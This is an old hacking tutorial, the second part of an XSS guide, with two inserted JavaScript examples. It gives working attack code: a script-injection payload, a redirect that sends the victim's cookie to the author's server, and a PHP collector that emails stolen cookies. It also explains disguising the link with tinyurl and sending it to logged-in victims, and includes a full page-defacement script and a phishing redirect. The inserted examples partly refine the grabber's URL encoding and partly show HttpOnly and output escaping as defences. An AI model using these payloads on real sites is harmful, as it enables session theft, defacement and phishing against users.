XSS Guide - Part 2
-------------------------------
Author: Langy
Date: 11-09-2007
Copyright: http://www.googlebig.com
-------------------------------
Links:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)
http://en.wikipedia.org/wiki/Cross-site_scripting
-------------------------------
At this point we need the victim's cookie, and this is where a "cookie grabber" comes in. A cookie grabber is a script hosted on our own server; we include it through the vulnerable URL so that the victim's browser sends its cookies straight to us.
How to include a JavaScript file:
Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script>
In cookiescript.js we write the code that reads the cookie (document.cookie) and hands it to a script on our server, which then sends it to us by email.
First of all we need a redirect to our site that carries the cookie as a query variable. Because cookiescript.js is loaded through a src attribute, the file must contain plain JavaScript with no <script> tags:
Code:
location.href = "http://googlebig.com/cookie.php?cookie=" + document.cookie;
Now we create cookie.php, which mails us whatever arrives in the cookie parameter:
Code:
<?php mail("admin@googlebig.com", "Here's the stolen cookie", $_GET['cookie']); ?>
Now upload cookie.php and cookiescript.js to our server and test by opening the vulnerable page with the payload above in our own browser. If everything works we will receive the cookie by email.
Now we send the link to the victim. We can send the full link or hide it behind a redirect service such as http://www.tinyurl.com
Once the redirect is created, in this case http://tinyurl.com/2rgry5, we contact the user, preferably through the same site, so that the link is opened while the user is logged in to the site (a session cookie is only useful while the victim's session is live).
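The grabber above concatenates document.cookie straight into the query string, and it silently gets nothing if the session cookie is marked HttpOnly. The following added example (mine, not Langy's code) shows the URL-building cookiescript.js should do, what cookie.php receives in the naive and the encoded case, and a check over Set-Cookie headers that reports which cookies document.cookie can read at all. The collector URL, the cookie string and the response headers are constructed for the demo.

```javascript
// Added example (not from the original guide): what cookiescript.js should
// compute, and the check that decides whether a grabber can work at all.
// The collector URL and the cookie strings below are constructed for the demo.

// Build the exfiltration URL the way cookiescript.js should: the cookie
// string goes through encodeURIComponent so that "; ", "&" and "=" inside
// it survive as one query parameter.
function buildGrabberUrl(collector, cookieString) {
  return collector + "?cookie=" + encodeURIComponent(cookieString);
}

// The naive concatenation used in the guide, for comparison.
function buildGrabberUrlNaive(collector, cookieString) {
  return collector + "?cookie=" + cookieString;
}

// What cookie.php's $_GET['cookie'] would see for a given URL.
function collectorSees(url) {
  return new URL(url).searchParams.get("cookie");
}

// Parse the Set-Cookie headers a site sends and report which cookies
// document.cookie can read. A cookie flagged HttpOnly is still sent to the
// server but is hidden from script, so a grabber never sees it.
function scriptReadableCookies(setCookieHeaders) {
  const readable = [];
  const hidden = [];
  for (const header of setCookieHeaders) {
    const parts = header.split(";").map((p) => p.trim());
    const name = parts[0].split("=")[0];
    const httpOnly = parts.slice(1).some((a) => a.toLowerCase() === "httponly");
    (httpOnly ? hidden : readable).push(name);
  }
  return { readable, hidden };
}

// Constructed demo data (assumed values, not taken from any real site).
const COLLECTOR = "http://googlebig.com/cookie.php";          // the guide's collector
const SAMPLE_COOKIE = "PHPSESSID=abc123; theme=dark&big";     // a document.cookie value
const SAMPLE_SET_COOKIE = [                                   // response headers
  "PHPSESSID=abc123; Path=/; HttpOnly",
  "theme=dark; Path=/",
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(buildGrabberUrlNaive(COLLECTOR, SAMPLE_COOKIE));
  console.log(collectorSees(buildGrabberUrlNaive(COLLECTOR, SAMPLE_COOKIE)));
  console.log(collectorSees(buildGrabberUrl(COLLECTOR, SAMPLE_COOKIE)));
  console.log(scriptReadableCookies(SAMPLE_SET_COOKIE));
}
```

Run it with node: the naive URL loses everything after the "&" in the cookie, the encoded one round-trips intact, and the header check shows that only "theme" is visible to script, so the session cookie in this constructed case would never reach cookie.php.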
XSS THAT DOESN'T WORK
If an XSS cannot be used for a redirect or to grab cookies, it can still be used to turn the page into a defacement or phishing page.
An example of code is:
Code:
var title = "XSSED BY GOOGLEBIG.COM";
var bgcolor = "#000000";
var image_url = "http://www.googlebig.com/googlebig.jpg";
var text = "Langy was here ;)";
var font_color = "#FFFFFF";
deface(title, bgcolor, image_url, text, font_color);

// Wipes the current page and replaces it with our own title, text and image.
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
    document.title = pageTitle;
    document.body.innerHTML = '';          // remove the original page content
    document.bgColor = bgColor;
    var overLay = document.createElement("div");
    overLay.style.textAlign = 'center';
    document.body.appendChild(overLay);
    var txt = document.createElement("p");
    txt.style.font = 'normal normal bold 36px Verdana';
    txt.style.color = fontColor;
    txt.innerHTML = pageText;
    overLay.appendChild(txt);
    if (imageUrl != "") {                  // the image is optional
        var newImg = document.createElement("img");
        newImg.setAttribute("border", '0');
        newImg.setAttribute("src", imageUrl);
        overLay.appendChild(newImg);
    }
    var footer = document.createElement("p");
    footer.style.font = 'italic normal normal 12px Arial';
    footer.style.color = '#DDDDDD';
    footer.innerHTML = pageTitle;
    overLay.appendChild(footer);
}
This code is saved as script.js on our server and loaded through the vulnerable parameter in this way:
Code:
http://[Sitevictim]/page.php?variable="><script src="http://www.googlebig.com/script.js"></script>
The vulnerable page will then load and run the JavaScript we created.
Here too we can rely on tinyurl to hide our full URL; the browser follows the redirect when it fetches the script:
Code:
http://[Sitevictim]/page.php?variable="><script src="http://tinyurl.com/xxxxx"></script>
Another way to bring the victim to the page we want is a plain redirect:
Code:
http://[Sitevictim]/page.php?variable="><script>
location.href="http://www.googlebig.com/fakepage.htm";</script>
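Every payload above assumes that page.php echoes the variable parameter unescaped into a double-quoted attribute, which is what lets "> close the attribute and the tag. The following added example (mine, not code from the guide) models that reflection point in JavaScript next to the fixed version that escapes on output, so the effect of the payload and of the fix can be seen side by side. page.php, the variable parameter and the input template are placeholders and assumptions.

```javascript
// Added example (not from the original guide): a model of the reflection
// point the payloads rely on, next to the fix. page.php, the "variable"
// parameter and the input template are assumed placeholders.

// page.php as the guide assumes it: the parameter is echoed unescaped into a
// double-quoted attribute, so a value starting with "> closes the attribute
// and the tag, and whatever follows is parsed as new markup.
function renderVulnerable(variable) {
  return '<input type="text" name="variable" value="' + variable + '">';
}

// Minimal HTML escaping: every character that can end an attribute value or
// start a tag becomes an entity.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// The hardened page.php: same template, parameter escaped on output.
function renderSafe(variable) {
  return '<input type="text" name="variable" value="' + escapeHtml(variable) + '">';
}

// Does the rendered page contain a real script tag? The template has none,
// so any match comes from the injected value.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The guide's payload, with the script host from the text.
const PAYLOAD = '"><script src="http://www.googlebig.com/script.js"></script>';

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderVulnerable(PAYLOAD));
  console.log(renderSafe(PAYLOAD));
}
```

Run it with node to print both renders: the vulnerable one contains a live script tag pointing at our server, the escaped one contains only entities inside the attribute value and the browser shows the payload as text.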
This guide was created for information purposes only.
If you have found an XSS you must post it at http://www.xssed.com/submit and you must contact the vulnerable site's admin.